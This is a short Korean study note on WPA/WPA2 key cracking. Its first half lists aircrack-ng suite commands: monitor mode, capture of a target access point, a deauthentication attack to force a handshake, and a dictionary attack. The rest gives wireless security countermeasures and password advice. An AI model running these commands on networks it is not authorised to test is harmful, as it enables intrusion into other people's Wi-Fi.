WPA 크래킹
airmon-ng start wlan0
모니터 모드 시작
airodump-ng mon0
AP 확인
airmon-ng stop mon0
모니터 정지
airmon-ng start wlan 7
7채널로 모니터 시작
airodump-ng --channel 7 --bssid [AP맥주소] -w 저장파일이름 mon0
aireplay-ng -0 [몇개] -a [AP맥주소] -c [AP에연결되어잇는장치맥주소] mon0
(오류가 난다면 airmon-ng check 와 airmon-ng check kill 을 입력하고 해보자)
이제 크래킹 해보자
aircrack-ng -b [AP맥주소] -w [사전파일] [캡처한파일명]
WPA2도 마찮가지로 하면 크랙할수 있었다
사전에 있는 키값을 사용하면 보안에 취약하는 사실을 알수 있었다
WPA 키 크래킹 보안 대책
1. 사용자 제어 정책
-무선 랜 사용과 관련된 조직의 보안 정책 개발
-무선 랜 사용자에 대한 보안 교육
-건물과 무선 랜 장비 사용 장소에 대한 물리적인 접근 제어
-집단 내에 보유한 무선 랜 장비의 목록 작성/관리
-WEP 암호화 사용금지
2. AP 제어
-무선 랜카드의 AP의 보안 패치 적용
-AP 송신 파워 조절
-AP 설치 시 외부와 인접한 장소(벽, 창문 등) 회피
-AP 설치시 외부에 신호가 노출되지 않게 주변 벽 재질을 RF 감쇠율이 높은 금속으로 사용
-미사용 AP 전원 차단
-AP의 Beacon 패킷(SSID 브로드캐스트) 기능 차단
-AP의 SSID 설정 시 부서명, 회사명, 제품명 등의 사용 금지
-MAC 필터링을 이용해 인가된 사용자만 접근 허용
3. 패스워드 정책
-특정 패턴을 갖는 패스워드
-관리자와 소속 기관의 정보를 바탕으로 구성된 패스워드
-한글, 영어 등을 포함한 사전적 단어로 구성된 패스워드
-특정 인물의 이름이나 널리 알려진 단어를 포함하는 패스워드
-숫자, 영문자를 비슷한 문자로 치환한 형태로 포함한 패스워드
-한글의 발음을 영문으로, 영문 단어의 발음을 한글로 변형한 형태의 패스워드
그렇다면 안전한 패스워드란 어떤 패스워드일까
-특정 명칭을 선택해 예측이 어렵게 가공해 패스워드 설정
-노래 제목과 명언, 속담, 가훈 등을 이용/가공해 패스워드 설정
-영문자(대소문자), 숫자, 특수 문자들을 흔합한 구성으로 패스워드 설정
-패스워드의 길이를 증가시키기 위해 문자열 앞뒤가 아닌 다른 위치에 특수 문자와 숫자 등을 삽입해 설정